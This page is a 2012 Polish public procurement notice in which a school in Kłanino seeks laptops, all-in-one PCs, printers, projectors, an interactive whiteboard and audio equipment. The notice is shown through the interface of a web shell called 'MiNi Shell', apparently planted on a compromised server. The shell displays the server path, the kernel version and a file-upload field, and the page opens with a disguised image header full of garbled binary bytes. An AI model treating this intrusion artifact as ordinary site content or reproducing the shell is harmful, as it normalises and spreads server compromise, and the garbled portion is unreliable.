JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121008/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121008/386278-N-2012.html

<p class="kh_header"><b>Starzyno: Zakup sprzętu komputerowego i pomocniczego na potrzeby projektu pn. Podniesienie atrakcyjności kształcenia zawodowego w Zespole Szkół Ponadgimnazjalnych w Kłaninie</b><br>
<b>Numer ogłoszenia: 386278 - 2012; data zamieszczenia: 08.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół Ponadgimnazjalnych w Kłaninie , Kłanino 22, 84-107 Starzyno, woj. pomorskie, tel. 58 673 87 83, faks 58 673 87 83.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup sprzętu komputerowego i pomocniczego na potrzeby projektu pn. Podniesienie atrakcyjności kształcenia zawodowego w Zespole Szkół Ponadgimnazjalnych w Kłaninie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakup sprzętu komputerowego i pomocniczego na potrzeby projektu pn. Podniesienie atrakcyjności kształcenia zawodowego w Zespole Szkół Ponadgimnazjalnych w Kłaninie.                                                                                                     Przedmiotem zamówienia jest zakup i dostawa do siedziby Zamawiającego n/w sprzętu o następujących parametrach                          
Komputer przenośny (laptop)-szt. 4                                                                                                              Wymagane parametry:         
Procesor:IntelR CoreTM  i5 2,5 GHz 3210M Cache L3 3MB lub kompatybilny
Przekątna ekranu:15,6 cala 
Rozdzielczość:1366x768                                                                                Pamięć RAM zainstalowana:8 GB
Malsymalna pamięć RAM: 16GB                                                                                                         Pojemność dysku:1TB 
Klawiatura numeryczna
Wbudowana kamera internetowa, napęd DVDRW, czytnik kart pamięci
Karta graficzna:GeForce GT 640MX CPU dedykowana oraz zintegrowana w procesorze INTEL HD Graphics 4000 lub kompatybilne
Wbudowany Bluetooth, WiFi 802.11 b/g/n, minimum 4 porty USB, HDMI, VGA (15 pin-D-SUB)
Bateria Li-Ion, 6 komorowa, nie mniej niż 4400 mAh
Zainstalowany system operacyjny Windows 7 Home Premium 64 bit
Waga:mniej niż 2,5kg
Dodatkowe wyposażenie:
Mysz bluetooth laserowa 1600dpi, torba na laptopa
-Komputer przenośny (laptop)  - szt. 10 
Wymagane parametry techniczne:                                                                                                Procesor:IntelR PentiumR Processor B960 2 rdzenie 2.2 GHz lub równoważny
Pamięć RAM zainstalowana:4 GB 
Maksymalna wielkość pamięci:8 GB
Pojemność dysku:500 GB                                                                                                            Przekątna ekranu:LCD 15.6 cali, nominalna rozdzielczość 1366 x 768 pikseli
Napęd optyczny:DVD?RW Super Multi Dual Layer
Złacze HDMI, VGA (D-SUB 15 pin), porty USB minimum 3 szt. (w tym USB 3.0 2 szt.)
wbudowane Bluetooth, WiFi 802.11 b/g/n, kamera internetowa, czytnik kart pamięci, wejście mikrofonowe,
Karta graficzna:ATI Mobility Radeon HD 6290
Bateria 6 komorowa
Zainstalowany system operacyjny Windows 7 Home Premium 64 bit
Waga nie więcej niż 2,6kg
Gwarancja:minimum 36  miesięcy
Dodatkowe wyposażenie:
Mysz bluetooth laserowa 1600dpi, torba na laptopa
Zestaw komputerowy-szt. 16 
Wymagane parametry:
Komputer typu All in One (zintegrowany w obudowie monitora)
Przekątna ekranu:21,5
Rozdzielczość:1920x1080 (HD1080)
Procesor:Intel Pentium G 630 2,7GHz cache L2 3MB                                                                                                          Pamięć RAM zainstalowana:4 GB
Pamięć RAM maksymalnie:8 GB                                                                                                            Karta graficzna:Intel HD (zintegrowana) 
Dysk twardy:250GB  SATA3/600 16MB 7200rpm
Wbudowane 2 głośniki, minimum 3W, wbudowana kamera 1,3MPix, napęd optyczny DVDRW, czytnik kart pamięci
Komunikacja:LAN 10/100/1000, WiFi 802.11 b/g/n, Bluetooth
Złacza zewnętrzne:
2 x USB 3.0, 3 x USB 2.0, 1 x HDMI, 1 x LAN, 1 x Optical Audio, 3 x Audio
W zestawie:klawiatura USB, myszka  optyczna USB, mocowanie VESA,
Zainstalowane oprogramowanie:Windows 7 Home Premium, Microsoft Office Starter
Gwarancja:nie mniej niż 36 miesięcy w miejscu instalacji (on site), czas reakcji serwisu 48h
Dołączone certyfikaty:ISO 9001, ISO 14001, ROHS
-Pakiet Microsoft Office 2010 standard, licencja edukacyjna z opcją Software Assurance (OfficeStd SNGL LicSAPk OLP NL Acdmc) na 30 stanowisk
Program do zarządzania placówką-szt. 1
Plan lekcji LIBRUS oraz sporządzanie i drukowanie świadectw dla uczniów technikum, szkół zawodowych, licealnych.
W zestawie pakiet szkoleniowy z obsługi i konfiguracji oprogramowania.
Urządzenie wielofunkcyjne (drukarka, kopiarka, skaner)-szt. 1
Wymagane parametry techniczne:                                                                                                Technologia druku:laserowa monochromatyczna   
Obsługiwane systemu operacyjne: Microsoft Windows 2000 /XP/ Server 2003, polskie sterowniki
Maksymalny rozmiar nośnika:A 3 
Obsługiwane nośniki:papier A3, papier A4, papier B4, papier B5, koperty, folia
Rozdzielczość druku w czerni:600 x 600 dpi                                                                                                            Maksymalna szybkość druku mono nie mniej niż:20 str./min.                                                                                                    Skaner:Skanowanie do TWAIN, Skanowanie do komputera, WIA , Skanowanie do skrzynki pocztowej, TIFF, PDF, BMP, oprogramowanie OCR-Abby FineReader
Szybkość kopiowania w czerni nie mniej niż:20 str./min.                                                                                                    Interfejs:USB 2.0, Ethernet 10/100 Mbps                                                                                                         Zainstalowane opcje:druk dwustronny automatyczny (duplex)                                                                                                     Szerokość urządzenia nie więcej niż:600 mm                                                                                                           Głębokość nie więcej niż:540 mm                                                                                                           Wysokość nie więcej niż:610 mm 
Normatywne obciążenie nie mniej niż:25000 str./miesiąc 
Zainstalowana pamięć, minimum:128MB
Podajnik papieru:2 szt. (taca na 250, taca na 50 arkuszy)
Toner:wydajność minimum 6300 stron, bęben 22000 stron.
Gwarancja 24 miesiące w miejscu instalacji
Drukarka laserowa monochromatyczna 2 szt:
Obsługiwane formaty:A4
Rozdzielczość:400x600 Dpi
Prędkość druku nie mniej niż 18 stron na minutę
Obciążenie miesięczne minimum 5000 stron 
Druk dwustronny:ręczny
Zainstalowana pamięć:minimum 8MB
Interfejs:USB, WIFI
W zestawie kabel USB
Projektor multimedialny 1 szt:
Technologia wyświetlania:DLP
Rozdzielczość:1280 x 800 (WXGA)
Jasność nie mniej niż:2500 ANSI Lumenów
Kontrast nie mniej niż:10000:1
Minimalna jasność obiektywu F/2.56
Zoom optyczny i cyfrowy
Minimalna odległość ekranu nie więcej niż:1,2m
Maksymalna odległość ekranu nie mniej niż:9,7m
Maksymalna przekątna ekranu nie mniej niż:300
Proporcje ekranu:16:10, 16:9, 4:3
Trwałość lampy nie mniej niż 5000h, w trybie ECO 6000h
Standard sygnału video:HDTV
Audio:tak
Korekcja zniekształceń pionowych -40°/+40°
Waga nie więcej niż 2,5kg
W zestawie pilot
Tablica interaktywna z projektorem krótkiej projekcji:
Przekątna tablicy:80
Format:4:3
Technologia rezystywna (obsługa bez dodatkowego rysika)
Podłaczenie do komputera:USB
Rozdzielczość nie mniej niż 9600
Dołaczone oprogramowanie:W języku polskim, możliwość archiwizacji notatek do popularnych formatów plików DOC, PPT, XLS, PDF, HTML, PDF, BMP, EMS, WMS, GIF, CDF, TIF, PNG Tryb myszy komputerowej oraz tryb graficzny. Funkcje powiększenia obrazu, kurtyny pionowej i poziomej. Możliwość otwierania plików graficznych w formacie: BMP, EMF, WMF, TIF, JPG, GIF, PNG; dokumentów: TXT, DOC, PPT, XLS. Materiał stworzony na tablicy można zapisać w formacie PDF, HTML, CDF oraz w powyżej wymienionych formatach.
Prędkość śledzenia:5m/sek. (prędkość przesyłu dla pisania/klikania 480 pkt./sek.)
Certyfikaty:CE, ISO 9001 dla producenta, ROHS,
W zestawie uchwyt naścienny pneumatyczny.
Projektor krótkiej projekcji:
Rozdzielczość maksymalna:1600x1200
Kontrast nie mniej niż:3000:1
Jasność nie mniej niż:3000 ANSI Lumenów
Gwarancja:24 miesiące
Proporcje ekranu:4:3
Współpraca ze standardem 3D
Technologia obrazu:DLP
Trwałość lampy:4000h
Złacza:USB, VGA
W zestawie pilot
UWAGA:Wymagana instalacja tablicy interaktywnej wraz z projektorem w świetlicy na 3 piętrze w budynku internatu. 
W skład wymaganej instalacji wchodzi:instalacja, konfiguracja oraz uruchomienie tablicy interaktywnej i projektora.
Instalacja okablowania sygnałowego i zasilającego, zainstalowanie dostarczonego oprogramowania.
Materiały wymagane do instalacji muszą zostać dostarczone przez wykonującego instalację. Wymagane szkolenie użytkownika z obsługi tablicy.
Zestaw nagłośnieniowy:
Głośniki:2xCS150/2 z wbudowanym odbiornikiem systemu bezprzewodowego
Mikrofon:Bezprzewodowy do ręki MH-202
Mikrofon bezprzewodowy nagłowny:MU-53H
Transmiter:Osobisty do mikrofonów MT-103
Zestaw głośnikowy wielokanałowy 5.1:
Ilość głośników:6
Regulatory, złacza:wyjście słuchawkowe, regulacja poziomu głośności, regulacja niskich tonów, regulacja barwy tonu, pilot
Moc całkowita głośników (RMS):500W
Głośnik niskotonowy:165W
Głośniki satelitarne  5x67 W
Certyfikat THXR
Dekodowanie Dolby Digital 5.1 
Dekodowanie DTS 
Stereo 3D 
Cyfrowe wejścia optyczne:2 
Cyfrowe wejście koncentryczne:1 
6-kanałowe wejście bezpośrednie 
Wejście RCA 
Wejście 3,5 mm:1 
Konsola sterowania:Kaskadowa 
Głośniki satelitarne:4, montowane do ściany 
Głośnik centralny:1, montowany do ściany 
Głośnik niskotonowy:Skierowany w bok, w wentylowanej obudowie 
Zdalne sterowanie:Podczerwień
Oprogramowanie dodatkowe:
InternetSecurity (kontrola rodzicielska) program antywirusowy+firewall wersja 2013.
Licencja na 40 stanowisk, aktualizacja bazy wirusów on-line przez okres minimum 36 miesięcy.
Radiodtwarzacz CD.
Wymagane parametry:
Sposób umieszczania płyty CD pionowo
Standardy odtwarzania:Audio CD, CD-R/RW, MP3, WMA
Radiocyfrowe Zakres fal radiowych FM
Liczba stacji radiowych do zaprogramowania 30 
Dźwięk  Dźwięk stereo 
Typ głośników szerokopasmowe 
Moc wyjściowa RMS 2 x 5 W + 2 x 15 W 
Korektor dźwięku tak
Podbicie basów tak
Pilot, zegar, wyłącznik czasowy (Sleeptimer), możliwość podłączenia iPoda, odtwarzanie plików MP3, WMA przez złącze USB, podświetlany wyświetlacz, Super Woofer, wbudowany wzmacniacz gitarowy.Uchwyt do przenoszenia. Wejścia/wyjścia stacja dokująca iPod/iPhone, USB, wejście liniowe AUX, wejście mikrofonowe, wyjście kompozytowe, wyjście słuchawkowe.
Waga (bez baterii) nie więcej niż 6,8 kg 
Zasilanie 10 baterii R20, sieciowe 220-240 V, 50/60 Hz. 
1.Ze względu na specyfikę przedmiotu zamówienia Zamawiający nie dopuszcza udziału podwykonawców przy realizacji przedmiotowego zamówienia.
2.Zamawiający nie dopuszcza możliwości składania ofert wariantowych.
3.Przedmiotem niniejszego postępowania nie jest zawarcie umowy ramowej.
4.Zamawiający nie dopuszcza możliwości udzielenia zamówień uzupełniających.
Kod CPV: CPV  30213100-6, 30213100-8, 302321108, 32322000-6, 32331600-8, 32342400-6.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 32.00.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 1.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.O udzielenie niniejszego zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące:
1)posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania,
Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień.
2)posiadania wiedzy i doświadczenia,
W celu potwierdzenia wiedzy i doświadczenia Wykonawcy powinni złożyć oświadczenie stanowiące załącznik Nr 6 do SIWZ
3)sytuacji ekonomicznej i finansowej,
Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.
2.Wykonawcy, którzy nie wykażą spełnienia warunków udziału w postępowaniu podlegać będą wykluczeniu z udziału w postępowaniu. 
3.Z udziału w niniejszym postępowaniu wyklucza się wykonawców, którzy podlegają wykluczeniu na podstawie art. 24 ust. 1 i 2 Prawa zamówień publicznych.
4.Ofertę wykonawcy wykluczonego uważa się za odrzuconą.
5.Zamawiający odrzuca ofertę, jeżeli:
1)jest niezgodną z ustawą;
2)jej treść nie odpowiada treści specyfikacji istotnych warunków zamówienia, z zastrzeżeniem art. 87 ust. 2 pkt. 3 Prawa zamówień publicznych;
3)jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji;
4)zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia;
5)została złożona przez wykonawcę wykluczonego z udziału w postępowaniu o udzielenie zamówienia;
6)zawiera błędy w obliczeniu ceny;
7)wykonawca w terminie 3 dni od dnia doręczenia zawiadomienia nie zgodził się na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt. 3 Prawa zamówień publicznych;
8)jest nieważna na podstawie odrębnych przepisów.
6.O wykluczeniu z postępowania oraz o odrzuceniu oferty wykonawcy zostaną zawiadomieni niezwłocznie po dokonaniu wyboru najkorzystniejszej oferty. Zawiadomienie zawierać będzie uzasadnienie faktyczne i prawne.
7.Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty i oświadczenia złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia/niespełna.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">opis urządzeń technicznych, instrukcję obsługi oraz środków stosowanych przez wykonawcę dostaw lub usług oraz opis zaplecza naukowo-badawczego wykonawcy, w celu potwierdzenia zapewnienia odpowiedniej jakości realizowanego zamówienia</li>

</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.zspklanino.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Szkół Ponadgimnazjalnych w Kłaninie, 84-107 Kłanino 22.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.10.2012 godzina 09:45, miejsce: Zespół Szkół Ponadgimnazjalnych w Kłaninie, 84-107 Klanino, sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Program Operacyjny Kapitał Ludzki, Priorytet IX-Rozwój wykształcenia i kompetncji w regionach, Działanie 9.2- Podniesienie atrakcyjności i jakości szkolnictwa zawodowego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com